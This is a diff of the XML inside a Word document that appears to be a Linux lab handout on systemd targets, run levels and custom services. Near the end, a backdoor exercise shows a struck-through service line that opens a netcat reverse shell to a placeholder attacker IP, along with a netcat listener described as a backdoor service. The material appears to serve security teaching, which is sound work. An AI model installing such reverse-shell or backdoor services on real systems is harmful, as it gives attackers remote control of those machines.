           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>active</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t>graphical.target       loaded active active Graphical Interface</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Basic System</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve">local-fs-pre.target    </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>cryptsetup.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>loaded</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">      loaded active </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t xml:space="preserve"> active active Local File Systems (Pre)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>active</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Encrypted Volumes</w:t>
+        <w:t>local-fs.target        loaded active active Local File Systems</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2316,372 +1875,54 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>getty.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t>multi-user.target      loaded active active Multi-User System</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">           loaded active </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>active</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t>network-online.target  loaded active active Network is Online</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Login Prompts</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>graphical.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">       loaded active </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>active</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Graphical Interface</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>local-fs-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>pre.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>loaded</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> active </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>active</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Local File Systems (Pre)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>local-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>fs.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        loaded active </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>active</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Local File Systems</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>multi-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>user.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      loaded active </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>active</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Multi-User System</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>network-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>online.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  loaded active </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>active</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Network is Online</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
         <w:t>&lt;snip&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>In this case, both multi-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>user.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>graphical.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> are active, so we must be in run level 5.</w:t>
+        <w:t>In this case, both multi-user.target and graphical.target are active, so we must be in run level 5.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2701,37 +1942,18 @@
         <w:t>run level 3</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">”, where </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>graphical.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> is not running, by using</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>systemctl isolate multi-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>user.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>”, where graphical.target is not running, by using</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>systemctl isolate multi-user.target</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -2745,27 +1967,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>This will cause all services required by the multi-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>user.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> unit file to continue or start, as needed.  All services not required by multi-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>user.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (all the graphical stuff in our case) will be stopped.</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>This will cause all services required by the multi-user.target unit file to continue or start, as needed.  All services not required by multi-user.target (all the graphical stuff in our case) will be stopped.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2786,26 +1989,14 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:iCs/>
         </w:rPr>
-        <w:t xml:space="preserve">systemctl isolate </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>graphical.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>systemctl isolate graphical.target</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Hand in</w:t>
       </w:r>
     </w:p>
@@ -2830,14 +2021,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>na</w:t>
+        <w:t xml:space="preserve"> -na</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2845,7 +2029,6 @@
         </w:rPr>
         <w:t>t</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -2925,24 +2108,12 @@
       <w:r>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
-      <w:hyperlink r:id="rId13" w:history="1">
+      <w:hyperlink r:id="rId16" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">This </w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>a</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>rticle</w:t>
+          <w:t>This article</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -2971,53 +2142,12 @@
       <w:r>
         <w:br/>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:strike/>
         </w:rPr>
-        <w:t>ExecStart</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:strike/>
-        </w:rPr>
-        <w:t>=/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:strike/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:strike/>
-        </w:rPr>
-        <w:t>/bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:strike/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:strike/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -e /bin/bash &lt;ATTACKER_IP&gt; &lt;PORT&gt; 2&gt;/dev/null</w:t>
+        <w:t>ExecStart=/usr/bin/nc -e /bin/bash &lt;ATTACKER_IP&gt; &lt;PORT&gt; 2&gt;/dev/null</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3078,43 +2208,16 @@
         <w:t>allow a remote machine to connect and send data</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">.  The backdoor service doesn’t do anything with the data, but it is fun </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>anyway.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>ExecStart</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>=/bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -l 1234</w:t>
+        <w:t>.  The backdoor service doesn’t do anything with the data, but it is fun anyway.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>ExecStart=/bin/nc -l 1234</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3125,15 +2228,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Once you have enabled, then started the new service you made, you can see if the service is running with </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>with</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Once you have enabled, then started the new service you made, you can see if the service is running with with </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3163,15 +2258,7 @@
         <w:t xml:space="preserve"> make a real back door</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> in Extra </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Extra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Fun</w:t>
+        <w:t xml:space="preserve"> in Extra Extra Fun</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
@@ -3182,15 +2269,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Extra </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Extra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Fun</w:t>
+        <w:t>Extra Extra Fun</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3235,7 +2314,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" 